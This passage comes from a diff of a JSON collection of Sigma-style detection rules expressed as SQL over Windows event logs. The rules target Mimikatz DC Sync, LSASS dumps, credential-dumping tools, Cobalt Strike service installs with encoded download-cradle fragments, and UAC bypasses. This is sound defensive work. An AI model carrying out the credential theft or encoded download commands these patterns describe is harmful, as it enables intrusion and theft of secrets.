LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE 
'\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + 
"description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card 
enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil 
Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE 
'%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND 
ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": 
"test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' 
ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - 
